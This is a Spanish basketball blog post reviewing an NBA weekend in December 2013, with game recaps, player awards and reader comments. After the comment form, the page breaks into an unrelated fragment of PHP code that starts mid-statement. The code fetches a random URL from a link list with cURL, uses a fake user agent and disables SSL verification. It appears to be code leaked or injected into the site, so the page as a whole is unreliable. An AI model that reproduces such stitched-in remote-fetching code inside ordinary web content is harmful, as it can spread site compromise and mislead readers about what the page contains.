Informe del fin de semana: Este deplorable

02 de December de 2013 por txusma

Tres densas jornadas de baloncesto en las que, como siempre, nos habéis cubierto las espaldas como solamente vosotros sabéis hacerlo. 3 densas jornadas que no hacen sinó confirmar el desastre que es la conferencia Este. Ahora mismo sólo 3 equipos (Pacers, Heat y Hawks) alcanzan el 50% de victorias mientras que en el Oeste son 12 los equipos. Queda todo dicho.

Del viernes prácticamente hubiéramos podido fusilar todo lo que comentó Denise en una crónica. Nos quedamos con esto:

“Los duelos GSW-OKL se están convirtiendo en una pasada. Ayer, el partido se fue a la prórroga y Westbrook con un triple inverosímil a 1 décima del final les hizo ganar después de que los Warriors no controlaran el rebote defensivo y le dejaran 3 posesiones a los Thunder.”

Efectivamente los mejores partidos hasta la fecha en esta liga los están protagonizando estos dos contendientes. Westbrook, con cierta polémica por estos lares y buena dosis de potra (además de que es muy bueno) les devolvió a los Warriors el anterior buzzer beater que les había clavado Iguodala. Hubiera quedado como mayor esfuerzo en vano el artista, Stephen Curry.

Hubo también bastante atención en la victoria de Lakers en Detroit, que mete a los amarillos en zona de playoffs, y en el anuncio de que este próximo viernes podría debutar Kobe. No obstante nos asombrábamos con el pésimo rédito del tiro exterior en los Pistons, cuando fue un partido dominado brutalmente por sus torres. Otro detalle los magníficos números de Josh Smith. Resalto números porque en realidad sus lagunas mentales tuvieron buena parte de responsabilidad en la derrota de su equipo. No vamos a restar méritos al gran partido de Wesley Johnson, pero le debe una al bueno de Josh. 

Comentábais también el gran partido de Jamal Crawford en ausencia de CP3 y el buen debut de Derrick Williams a pesar de la derrota. El otro MVP de la jornada fue Jrue Holiday destrozando a su ex-equipo con una dirección exquisita.

También se habló del tiro en el pie de los Mavs en Atlanta, aunque hay que decir que buena parte del apagón se produjo justo cuando Calderón se lesionaba, y de las vergüenzas típicas de Cavs (ante Celtics), Nets (ante Rockets) y Knicks… Estos últimos al menos tuvieron en su mano forzar la prórroga en Denver, pero falló el “clutch” Melo. Pero no pasa nada. En el Este, si ganas 3 partidos seguidos te metes en la pomada.

En el resto de encuentros se cumplió el expediente, sin grandes temas destacables. Los Bucks continuaban su viacrucis en Charlotte, los Spurs destrozaron a loa Magic, los Heat lograron su 9ª victoria consecutiva con ciertos apuros en Toronto, los Pacers asfixiaron a los Wizards y los Suns ganaron en Utah (aunque el sábado les devolvieron la moneda).

El sábado franitis lanzaba esta cuestión: “¿Empieza Jared Sullinger a oler un poco a MIP? Así como quien no quiere la cosa se está poniendo en un promedio de 14 ppp y 7 rpp y subiendo…”

Efectivamente, gran actuación y rendimiento en genera pero mal día para sacar pecho porque no sirvió de mucho en una plaza tan asequible como Milwaukee.

Se destacaba el partidazo de Bynum y el rendimiento de Ricky (ambos tras los destripes de Denise) que servían para asegurar victorias ante Chicago y Dallas respectivamente. Los Nets también se sumaban a la tendencia de respondernos ganando bien en Memphis, donde tampoco están ahora mismo para muchos trotes. Por su parte, los Wizards ganaban a Atlanta en la capital y les soplan la nuca en la clasificación.

Con todo el choque estrella del Saturday night fever fue el Rockets@Spurs, donde Harden y los suyos rompieron la imbatibilidad del Álamo: “Se escapaban los Rockets de 20 puntos antes de acabar la primera parte gracias a los triples y a un momento de inspiración de la dupla García – Casspi hasta que Parker en 2 minutos lo ha dejado en 10 para que no se les escapara el asunto. Brillante tercer cuarto para llegar igualados al último y lamentablemente (y como no podía ser de otra forma) nos hemos tenido que comer el Hack-a-Howard y el No-Hack-a-Harden-pero-da-igual-que-me-voy-a-linea-de-tiros-libres-pase-lo-q ue-pase. No les ha salido muy bien lo primero. De hecho en una de estas el pillo de Harden ha aprovechado para tirar de tres mientras le hacían falta a Dwight y se ha llevado 3 tiros. Buena victoria de Houston que empieza a funcionar muy bien, coincidiendo “casualmente” con la entrada de Terrence Jones como PF titular.” Rumbero

Y anoche, seguimiento especial para los partidos en horario potable, como el Denver – Toronto:

“Wow!! Denver jugando gran parte del último cuarto con un perimetro formado por Robinson, Lawson, y Miller, con Wilson Chandler de 4 y Mozgov de 5. Eso que es? el super mini-small ball o que??” Simon

Empezaron muy fuertes los Raptors con Tyler Hansbrough de titular ya que Amir Johnson no está dando el enorme rendimiento que dio el año pasado y Dwane Casey ha decidido sentarlo en favor del ex de Indiana. Sin embargo, las entradas de Nate Robinson y Timofey Mozgov cambiaron el signo del partido. El ruso se encargó en Jonas Valanciunas y “Kyrptonita” hizo lo que mejor sabe: incendiar los partidos a su favor en los momentos calientes.

A una hora mundana también asistimos a la exhibición de Andre Drummond ante los Sixers: 31 puntos, 19 rebotes, 6 robos y 2 tapones, y eso que falló 11 de los 18 tiros libres que intentó. Pero el partido estrella del día era el Pacers – Clippers, resuelto a favor de los visitantes de la mano de David West y Paul George. Jamal Crawford fue el mejor en un equipo (no os perdáis el crossover) que va a echar de menos a JJ Redick, lesionado para un par de meses. Los Pacers siguen firmen al frente de la clasificación, a ritmo de mejorar las 72 victorias de los Bulls de la 95-96. No muy lejos siguen los Heat que ayer sudaron la gota gorda para doblegar en casa a unos irreconocibles Bobcats. Sinó llega a ser por el acierto de Chris Bosh en los minutos finales, palman. A los que no le van nada bien las cosas es a los Knicks que acumularon la 9ª derrota consecutiva, esta vez en casa ante New Orleans, y eso que Anthony Davis se lesionó en el primer cuarto y ya no volvió a jugar. Se habla de un mes apartado de las canchas.

En el resto de duelos de la noche, victoria de los Thunder ante los Wolves con triple-doble de Kevin Durant que casi se convirtió en 5×5 (32-10-12 y 4 tapones y 4 robos), victoria de los Blazers en Los Angeles, ante los Lakers que los aúpa al primer puesto de la conferencia Oeste y victoria ajustadísima de los Warriors en Sacramento. Sin Iguodala, Golden State necesita que Stephen Curry haga de todo y bien. Ayer anotó 36 puntos, repartió 10 asistencias y anotó los tiros libres que certificaban la victoria. Sólo le faltó pasar la mopa y cerrar el pabellón.

PREMIOS

MVP: El viernes no estuvo del todo fino a pesar de anotar 25 puntos y coger 13 rebotes pero ayer se salió por todos los lados. Kevin Durant consiguió el 4º triple-doble de su carrera gracias a los 32 puntos, 10 rebotes y 12 asistencias que adornó con 4 robos y 4 tapones. A cierta distancia se sitúan Paul George y Jrue Holiday. El de los Pacers lideró a su equipo a sendas victorias con 23 puntos, 4 rebotes, 4 asistencias y 4 robos el viernes y 27 puntos, 6 rebotes, 5 asistencias y 2 robos, ayer ante los Clippers. Por su parte, el jugador de los Pelicans empieza a coger el ritmo y el viernes firmó una gran actuación con 20 puntos, 7 rebotes, 13 asistencias y 3 robos. Anoche no estuvo tan espectacular (11 puntos, 5 rebotes, 9 asistencias) per los Pelicans también se llevaron la victoria. Sería injusto no nombrar a Lebron James a pesar de que nos tiene acostumbrado a estas actuaciones: 27-6 el viernes y 26-5-4 ayer.

Rookie: Trey Burke lo tiene todo de cara para pelear el ROY. El viernes anotó 13 puntos pero el sábado se fue a los 20 puntos y 6 rebotes. De todas formas, aún tiene que mejorar para llegar al nivel de Michael Carter-Williams autor de 10 puntos y 10 asistencias el viernes ante NO y de 15 puntos, 6 rebotes, 6 asistencias y 6 robos, ayer ante los Pistons. Victor Oladipo anotó 15 puntos y puso 3 tapones el viernes contra los Spurs. Tim Hardaway Jr. gana minutos en medio de la debacle de los Knicks y no responde mal. Anotó 8 puntos ante Denver y 21 ayer ante los Pelicans.

Sorpresa: Los Bucks consiguieron la victoria el sábado de la mano de Brandon Knight que se quedó cerca del triple doble con 20 puntos, 9 rebotes y 8 asistencias. Quincy Pondexter anotó 22 puntos también el sábado en la derrota de los Grizzlies ante los Nets. El día antes, Wesley Johnson se había salido con 27 puntos y 6 rebotes ante Detroit. Timofey Mozgov pasó de no anotar ante los Knicks el viernes a meter 16 puntos y coger 15 rebotes ayer, ante los Raptors. Otro pívot, Andrew Bynum, se fue a los 20 puntos, 10 rebotes y 5 tapones el sábado. ¿Canto del cisne?

Esfuerzo en vano: Tremendo fin de semana de Stephen Curry que ha de multiplicarse ante la baja de Andre Iguodala. Si el viernes consiguió 32 puntos, 11 rebotes y 5 asistencias, anoche se fue a los 36 puntos y 10 asistencias. Ambos partidos estuvieron muy igualados pero solo pudo llevarse el de ayer, ante los Kings. La otra actuación animal del fin de semana es la de Andre Drummond: 31 puntos, 19 rebotes y 6 robos.

Comenta

9 comentarios a esta entrada

  1. Vader dice:
    #1

    Fantástico resumen!!!

    Mis Knicks siguen a lo suyo, por lo menos los partidos se disputan y algún dia empezaran a caer del lado nuestro. Seguramente coincidirá con la vuelta de Chandler. Hace falta fichar un pivot que aporte defensa y rebotes, viendo la pinta de Hardaway JR seguramente Shumpert acabará saliendo para que llegue este refuerzo.

    De las pocas notas positivas del año me quedo con Bargiani que esta cumpliendo muy bien. Tengo ganas de verlo con un pivot de verdad al lado. En ataque esta muy bien y en defensa, que sabemos que no es su fuerte, esta alortando sus buenos rebotes y tapones. Recordando que vino por camby, noval y una primera ronda no parece mal negocio.

    Me alegro que los Nuggets vayan bien, me alegro por su entrenador. Espero que al bueno de Brian tenga mucho exito ahora que por fin le ha llegado la oportunidad.

    Saludos

      Citar

  2. Ruxixón dice:
    #2

    Vaya señor equipo que son los Pacers,esperemos que pierdan algún partido en su gira por el oeste porque la sensación que dan es que no tienen ningún resquicio por donde meterles mano,más aún podían aprovechar mucho más a Hibbert.Próximas paradas Portland,Utah,San Antonio y Oklahoma.

      Citar

  3. rumbero dice:
    #3

    Vader:
    Fantástico resumen!!!

    Mis Knicks siguen a lo suyo, por lo menos los partidos se disputan y algún dia empezaran a caer del lado nuestro. Seguramente coincidirá con la vuelta de Chandler. Hace falta fichar un pivot que aporte defensa y rebotes, viendo la pinta de Hardaway JR seguramente Shumpert acabará saliendo para que llegue este refuerzo.

    De las pocas notas positivas del año me quedo con Bargiani que esta cumpliendo muy bien. Tengo ganas de verlo con un pivot de verdad al lado. En ataque esta muy bien y en defensa, que sabemos que no es su fuerte, esta alortando sus buenos rebotes y tapones. Recordando que vino por camby, noval y una primera ronda no parece mal negocio.

    Me alegro que los Nuggets vayan bien, me alegro por su entrenador. Espero que al bueno de Brian tenga mucho exito ahora que por fin le ha llegado la oportunidad.

    Saludos

    Ahora mismo a los Knicks les hace falta que vuelva Chandler, King , Ewing y Houston O_o
    Ya en serio, con Tyson es obvio que deben mejorar en defensa y en el apartado reboteador, pero tener que fiarlo todo a su estado físico ya a estas alturas creo que es un problemón. Y en ataque no parece que vaya a variar mucho la dinámica que consiste en que Melo se casque 40 minutos por partido con lo que eso conlleva y que la segunda espada se tire lo que quiera teniendo el peor FG% del equipo (.331 con un espectacular .296 en 3P). No se, a mi me da la impresión que desde que empezaron los PO de la pasada temporada juegan básicamente a ver quien se la tira con la isolation de turno. Ojalá me equivoque y tus Knicks mejoren mucho porque el nivel de la conferencia lo necesita.

      Citar

  4. Mamba_Blanca dice:
    #4

    En sorpresas, se os ha olvidado nombrar a Sacre: 24 minutos, 5/8 para 12 ptos, 7 rebotes, 4 asistencias y 3 tapones.

      Citar

  5. Vader dice:
    #5

    @rumbero

    Ya dije al principio de temporada que los Knicks este año primera o segunda ronda como mucho y me mantengo en ello.

    No es que crea que con Chandler den un salto de calidad increible pero les llena el agujero que tienen en la zona y el equipo lo notará mucho defensivamente. Mejorar la defensa significa más contrataques y puntos faciles. Por eso creo que cuando él vuelva se iran ganando partidos y tal como esta el Este nos metemos en la pomada rápido.

    Eso si, con Chandler no hay suficiente ¿donde hay que firmar ese Shumpert-Faried? XD

    Saludos

      Citar

  6. Denise dice:
    #6

    Mamba_Blanca:
    En sorpresas, se os ha olvidado nombrar a Sacre: 24 minutos, 5/8 para 12 ptos, 7 rebotes, 4 asistencias y 3 tapones.

    Sacre ha metido mas puntos , ha cogido mas rebotes, ha dado mas asistencias y ha puesto mas tapones que Pau Gasol y en menos tiempo. Alguien tenía que decirlo.

    Redick está jugando muy bien, por encima de sus posibilidades diria yo, pero su baja no le debe afectar a Clippers, al revés, a la larga le va a venir bien porque vamos a poder descubrir a un jugador de rotación muy util como Reggie Bullock, y Collison va a poder tener mas minutos jugando al lado de Paul y no solo a su sombra.

    Los Pacers tienen un plantillón, escpecialmente en el perimetro, pero deben de tener cuidado y que West y Hibbert lleguen 100% a los Playoffs, por detras Scola lo veo muy acabado, aporta la brega y la intensidad de siempre pero ya no está fisicamente para muchos trotes y Mahinmi siempre ha sido un jugador limitado. Creo que deberían conseguir otro reserva interior que les de mas profundidad. En ese aspecto, el equipo lo veo muy desequilibrado, mucha gente por fuera y muy poca por dentro, parece como si se hubiesen querido cuidar las espaldas con el tema Granger y ahora tienen un overbooking de alas bestial.

    Me encanta Drummond desde que lo ví el dia del Draft y ya dije que iba a ser mejor que DH cuando lo vi en el training camp del año pasado. Baloncestisticamente hablando, estoy enamorado de él. Libero dopamina viendolo jugar xD.
    Por otra parte, quiero criticar al merluzo del entrenador de Utah por darle tan pocos minutos a Gobert, otro tio dominador de aqui a 2 años.

      Citar

  7. HisRoyalAirness dice:
    #7

    Por favor, los 16 equipos com mejor record a Playoffs y ya!!! Nada de Conferencias!!! Por favor, es que el último clasificado para playoffa en el Oeste sería tercero en el Este!! Sólo Miami e Indiana entrarían en las eliminatorias!!
    Somos conscientes de la primera y segunda ronda que van a tener Pacers y Heat?

    Me paso los dos anillos de los Heat por el arco de triunfo. Duncan tiene 5 para mí

      Citar

  8. HisRoyalAirness dice:
    #8

    Y creo que Scola como sexto-séptimo hombre, pese a caerme como una patada en los huevos, es un lujo

      Citar

  9. Vader dice:
    #9

    Esperando el resumen de hoy, pocos partidos pero todos muy interesantes 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>